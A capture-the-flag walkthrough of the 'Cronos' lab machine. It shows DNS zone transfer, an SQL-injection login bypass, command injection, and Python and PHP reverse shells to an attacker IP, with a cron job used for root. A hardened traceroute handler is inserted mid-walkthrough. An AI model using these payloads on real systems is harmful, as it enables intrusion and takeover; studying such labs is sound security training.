Cronos

Overview
Initial Foothold : SQL injection followed by command injection
Privilege Escalation : Scheduled task (cron job) running as root
Enumeration
Starting with port scanning.
Port Scanning
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
| 256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_ 256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Cronos
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.13 (92%), Linux 3.2 - 4.9 (92%), Linux 3.12 (90%), Linux 3.13 or 4.2 (90%), Linux 3.16 (90%), Linux 3.16 - 4.6 (90%), Linux 3.18 (90%), Linux 3.8 - 3.11 (90%), Linux 4.2 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Interestingly, port 53 was open, which tells us that a DNS server is running.
Let's start with DNS enumeration.
DNS Enumeration
First of all, add the hostname of the machine, which is cronos.htb, to the /etc/hosts file.

Now let's attempt a zone transfer.
With the help of a zone transfer we can obtain potential subdomains of the site that is running.
If you want to learn what a zone transfer is and why it works, refer to
Zone transfer using the dig command
dig axfr cronos.htb @10.10.10.13

Got some subdomains for the hostname cronos.htb.
Let's add them to our /etc/hosts file.

That's all for DNS enumeration; we got the information we needed.
Web Enumeration
Let's visit the webpage.

A simple webpage was running.
Used directory bruteforce but got nothing,
but from our previous DNS enumeration we had got some subdomains.
Let's use them.
At admin.cronos.htb we got a login page.

We don't have creds, so let's try SQL injection on this login page,
and we successfully logged in using
Username : admin'or'1'='1; #
Password : password
The above SQL injection got us logged in as the admin user.

Exploitation
After logging in we got a webpage which performs a traceroute.
There may be a possibility of command injection here, because the traceroute was being executed on the server side.
Let's try command injection.

Using the query 8.8.8.8;ls we got the above result,
hence it is confirmed that there is a command injection vulnerability in the above webpage.
Let's use this to get a reverse shell.
Now use a reverse shell from the pentestmonkey site.
Try the Python reverse shell command:
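As an added defensive note (not part of the original writeup), this is the root cause and the fix for the traceroute page: the application concatenated the user-supplied target into a shell command, so a value like 8.8.8.8;ls became a second command. The hardened handler below (assumed names validate_target and traceroute_argv, written for this note) allows only a bare IP address or hostname and passes it as a single argv element with no shell.

```python
import ipaddress
import re
import subprocess
from typing import List, Optional

# Hostname rule (RFC 1123 style): dot-separated labels of letters, digits and
# hyphens, no label starting or ending with a hyphen, 253 characters at most.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*\.?$"
)


def validate_target(raw: str) -> Optional[str]:
    """Return the target if it is a bare IP address or hostname, else None.

    Shell metacharacters (';', '|', '&', '$', spaces, ...) are not valid in
    either form, so the writeup's payload '8.8.8.8;ls' is rejected here.
    """
    candidate = raw.strip()
    if not candidate:
        return None
    try:
        return str(ipaddress.ip_address(candidate))  # normalised IPv4/IPv6
    except ValueError:
        pass
    if _HOSTNAME_RE.match(candidate):
        return candidate
    return None


def vulnerable_command(raw: str) -> str:
    """The pattern behind the bug: untrusted input pasted into a shell string."""
    return "traceroute " + raw


def traceroute_argv(raw: str) -> List[str]:
    """Build an argv list for traceroute; never a shell string.

    Validation rejects anything that is not an address or hostname, and the
    argv form means the value is always exactly one argument to traceroute.
    """
    target = validate_target(raw)
    if target is None:
        raise ValueError("invalid traceroute target")
    return ["traceroute", target]


def run_traceroute(raw: str) -> str:
    """Execute traceroute safely (no shell=True) and return its stdout."""
    result = subprocess.run(traceroute_argv(raw), capture_output=True,
                            text=True, timeout=60, check=False)
    return result.stdout
```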
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.40",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Enter the above command in the textbox of the webpage and set up a listener on port 1234.


And we got the reverse shell.
Grab the user.txt file.

Privilege Escalation
After some enumeration we found that there was a scheduled task (cron job) running with root permissions whose script the user can overwrite.


Let's overwrite the file
with our reverse shell code and set up a listener:
<?php
$sock=fsockopen("10.10.14.40",4444);exec("/bin/sh -i <&3 >&3 2>&3");

After some time the task was executed and we got the root shell on port 4444.

That's all for this box.
Goodbye :)